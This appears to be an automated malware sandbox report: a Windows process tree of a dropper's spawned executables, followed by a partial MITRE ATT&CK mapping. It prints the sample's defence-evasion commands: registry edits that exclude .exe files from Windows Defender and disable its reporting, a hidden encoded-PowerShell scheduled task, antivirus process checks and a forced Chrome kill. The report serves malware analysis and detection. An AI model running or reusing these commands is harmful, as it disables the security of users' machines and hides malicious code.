C:\Users\Admin\Pictures\Adobe Films\WEQebRcSNauy6Cpuw2THycbD.exe
"C:\Users\Admin\Pictures\Adobe Films\WEQebRcSNauy6Cpuw2THycbD.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies system certificate store
PID:1544

C:\Users\Admin\Pictures\Adobe Films\NwoIpz8newKLP_JbvBqEmObE.exe
"C:\Users\Admin\Pictures\Adobe Films\NwoIpz8newKLP_JbvBqEmObE.exe"
3⤵
- Executes dropped EXE
PID:476

C:\Users\Admin\Pictures\Adobe Films\rN_y9ppu64RkmxKN25ul45dg.exe
"C:\Users\Admin\Pictures\Adobe Films\rN_y9ppu64RkmxKN25ul45dg.exe"
3⤵
- Executes dropped EXE
PID:1380

C:\Users\Admin\Pictures\Adobe Films\ZeLyxOA4x6myxubrySf6Y1C4.exe
"C:\Users\Admin\Pictures\Adobe Films\ZeLyxOA4x6myxubrySf6Y1C4.exe"
3⤵
- Executes dropped EXE
PID:1948

C:\Users\Admin\Pictures\Adobe Films\1zutRQC84YQUeKHjVUlfDZOh.exe
"C:\Users\Admin\Pictures\Adobe Films\1zutRQC84YQUeKHjVUlfDZOh.exe"
3⤵
- Executes dropped EXE
PID:2076

C:\Users\Admin\Pictures\Adobe Films\CtM5aIFdy9l7O2ZzbFQu_T6r.exe
"C:\Users\Admin\Pictures\Adobe Films\CtM5aIFdy9l7O2ZzbFQu_T6r.exe"
3⤵
- Executes dropped EXE
PID:2128

C:\Users\Admin\Pictures\Adobe Films\bbEPjtArMWCNdjrdheBgslis.exe
"C:\Users\Admin\Pictures\Adobe Films\bbEPjtArMWCNdjrdheBgslis.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2104

C:\Users\Admin\AppData\Local\Temp\7zSD3D3.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
PID:2740

C:\Users\Admin\AppData\Local\Temp\7zSEAFB.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2944

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:2752

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2436

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:2464

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:2816

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:2984

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gUrhsBOxq" /SC once /ST 10:38:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:2764

C:\Users\Admin\Pictures\Adobe Films\ueYwx1EQ2yqaop1hxO0JLc18.exe
"C:\Users\Admin\Pictures\Adobe Films\ueYwx1EQ2yqaop1hxO0JLc18.exe"
3⤵
- Executes dropped EXE
PID:2164

C:\Users\Admin\Pictures\Adobe Films\fIGgIArMNFm5pubwBduQ13bQ.exe
"C:\Users\Admin\Pictures\Adobe Films\fIGgIArMNFm5pubwBduQ13bQ.exe"
3⤵
- Executes dropped EXE
PID:2208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:2444

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:2472

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:2492

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:2532

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:2620

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:2628

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
6⤵
PID:2724

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2792

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
6⤵
PID:2812

C:\Users\Admin\Pictures\Adobe Films\bhS_3O82HAabngAzjB0oIpub.exe
"C:\Users\Admin\Pictures\Adobe Films\bhS_3O82HAabngAzjB0oIpub.exe"
3⤵
- Executes dropped EXE
PID:2176

C:\Users\Admin\Pictures\Adobe Films\Yn2D5Jnu3MxWvJFv4qk6iDUo.exe
"C:\Users\Admin\Pictures\Adobe Films\Yn2D5Jnu3MxWvJFv4qk6iDUo.exe"
3⤵
- Executes dropped EXE
PID:2232

C:\Users\Admin\Pictures\Adobe Films\KWRu6SEB9fb1yJgxtHKIYCuY.exe
"C:\Users\Admin\Pictures\Adobe Films\KWRu6SEB9fb1yJgxtHKIYCuY.exe"
3⤵
- Executes dropped EXE
PID:2220

C:\Users\Admin\Pictures\Adobe Films\bfgCQBkJldfvK7hOSpVN1_S0.exe
"C:\Users\Admin\Pictures\Adobe Films\bfgCQBkJldfvK7hOSpVN1_S0.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
4⤵
PID:548

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
5⤵
- Kills process with taskkill
PID:476

C:\Users\Admin\Pictures\Adobe Films\q1fjC1dHultjKflZL89R3iCI.exe
"C:\Users\Admin\Pictures\Adobe Films\q1fjC1dHultjKflZL89R3iCI.exe"
3⤵
- Executes dropped EXE
PID:2716

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1800

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220310150849.log C:\Windows\Logs\CBS\CbsPersist_20220310150849.cab
1⤵
- Drops file in Windows directory
PID:1528

C:\Windows\system32\taskeng.exe
taskeng.exe {51192914-AB94-4353-A0E9-436EB389153C} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]
1⤵
PID:2632

C:\Users\Admin\AppData\Roaming\virgfrf
C:\Users\Admin\AppData\Roaming\virgfrf
2⤵
- Executes dropped EXE
PID:1188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery